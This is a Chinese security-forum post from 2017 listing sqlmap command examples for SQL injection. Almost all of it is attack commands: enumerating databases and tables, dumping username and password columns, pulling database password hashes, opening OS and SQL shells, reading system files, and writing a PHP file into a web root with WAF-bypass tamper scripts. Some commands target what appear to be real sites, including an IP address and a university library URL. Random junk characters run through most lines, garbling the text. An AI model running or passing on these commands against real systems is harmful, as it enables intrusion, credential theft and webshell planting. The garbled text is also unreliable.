找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2082|回复: 0
打印 上一主题 下一主题

sqlmap使用实例

[复制链接]
跳转到指定楼层
楼主
发表于 2017-5-19 17:03:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/pentest/database/sqlmap4 I3 `! Q/ c; V: L5 J+ J$ Z9 M
1 O$ n8 a; T3 x1 f/ i" {. [
update :::::>     in the folder   after  execute    following   order : svn update
& X, J' Z+ s# e; g; H! R3 f4 F
+ `6 o7 a; A& P2 c! I7 V$ b( Hsqlmap.py -r 1.txt --current-db6 A8 B* |$ `  w5 k

2 F6 h# l% N' \6 e& {v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
2 C7 u  ]7 ~8 Q. E9 ]- ?% U
: g1 V2 U9 F# {$ [0 o! ^1 I$ P==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1)) 4 V! g) L4 _) J1 l4 {: I
猜解数据库6 {1 d6 d* A1 r$ ]( Q: F
./sqlmap.py -u "injection-url" --dbs5 S! M; V  B/ P
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
3 ^2 v& z! H6 a1 C  a9 y9 C6 ]
- ~0 M& r, B. I: y) H猜解表名
+ L% [* _; X9 d* u5 H./sqlmap.py -u "injection-url" -D database_name --tables% b0 Y  H0 F/ l) M* M' g

4 b3 T5 M" O& P- z8 [- k& Z1 Gsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
) P0 r/ L0 g2 s$ C0 S" ?) msqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
$ e8 `1 M! _0 Q9 u/ Z( _) C" G# D3 v
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
0 V- I  [' o! f$ W" h( @' K) c1 d$ X  {+ }% }5 V$ N( r; K6 \; U
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"$ p4 E/ c& w2 J5 b6 E6 O4 _- S1 A
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"4 w$ r6 ?, ~# N  g
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" 3 H; e; Q  C7 }6 e6 B+ B. i" o! B
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
, d- c8 I- v  q' h
6 l( L8 \" X/ e) K6 k8 G& Wsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"# v: \. k6 M6 R
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
( E$ a1 G0 Z% A/ @+ a. d& z8 Isqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"+ ~& b( t$ ]; U) j
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"* [) b+ O, s2 ^% a$ \" l4 n" E
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
; V% r5 C: q+ A& T
% e! r2 T. j& W: C; o' C* i' O6 Psqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了- U& F( }' w% x; n
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py") g& T  j. E8 M

4 F# R# l9 K9 c7 ^: msqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"8 S% t  q% S, b1 N! N5 l
猜解列名
+ m/ f1 _0 l1 L6 {% |9 a$ l1 G( e./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
, o3 A. x. @7 Y/ o4 C; `# N3 T/ f1 [" O' T1 l0 Q( {+ H% K2 k  n7 r
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
' H2 T' f7 G" O: f0 g% L( [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
( [% X( j$ g8 m3 z! {! Z! ~  ~sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
' v6 k3 n5 r* I8 ]' L+ V3 c( V, ]  {+ p* ^' C
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"2 q% e; o- [. M" t! H7 @$ b8 F
&submit=Go
" U( g' L  O( M/ f# Y0 [猜解值
1 a) \+ I! i8 J* U: L% C./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump$ m# F% V: I4 @
========================================================
1 f6 B* v  u* ~8 @2 ?7 x搜索表名中包括mana字符的
0 ?0 t+ M; f) r' {3 U+ D2 R0 `/sqlmap.py -u "injection-url" -T mana --search
* Y" G. A) L3 b, J返回一个交互式sql shell
' M4 `- P) X* q" q; U% r0 V1 R& k/sqlmap.py -u "injection-url" --sql-shell
  N; W3 I" I; S/ Y8 O读取指定文件(需权限)
8 h5 x) L3 J9 h, ^/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"0 b7 `3 K* f4 G: z9 u5 I" @
查看当前 用户 及 数据库
+ g# {; ?* z9 X" @2 Z1 O( ]/sqlmap.py -u "injection-url" --current-user --current-db
6 P% y2 z. \- r* Q本地文件 写入 远程目标绝对路径
- e% \4 i% D7 {$ d$ G  e/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径" k* |  s/ b2 ^9 x% Q7 C
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
. N9 G7 K& V* O
  C. K2 A& f6 n# g  J# o& isqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
$ X8 `; A& ~4 L( U4 W. l4 f查看某用的权限, ^, t/ X. z4 `. m
/sqlmap.py -u "injection-url" --privileges -U root8 a* \; L* j# v3 J& @9 ~
查看当前用户是否为dba9 E$ b1 ^: ?$ C  W+ u( Y3 G
/sqlmap.py -u "injection-url" --is-dba
* ~2 u* x: B8 V% r# r读取所有数据库用户或指定数据库用户的密码2 @! r- K2 T8 J! ~& V% O/ c
sqlmap.py -r 1.txt --users --passwords
# X6 B' X# R- e% ?  a, S, hsqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
0 ]/ v, i1 K1 h8 B8 I& z7 r! {6 k7 C2 m/ Z, ]2 O) ~
/sqlmap.py -u "injection-url" --passwords -U root( A  B- s6 N2 Z: S* w% q8 j1 F( |; t

, W$ o. L  P0 D. ~0 O--start&&--stop 与 --first&&--last 的区别
: u" y5 k0 s5 Z6 {8 H: b/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)+ M, E) E# m' P2 u6 C( t

- I! D  W  `' O% {( j从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)' }6 f$ E4 Y3 Y2 }) r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables' Z9 ]: K* J) t: a4 b4 k
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
4 d1 G, r% L, R' t) p% v5 h' N2 K- ?' z3 B- G' {* `8 Y- b, `
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
0 l$ l1 Z# y- w/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
. o( g. g! P5 d% Y1 P" |1 d/ o% @1 b
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表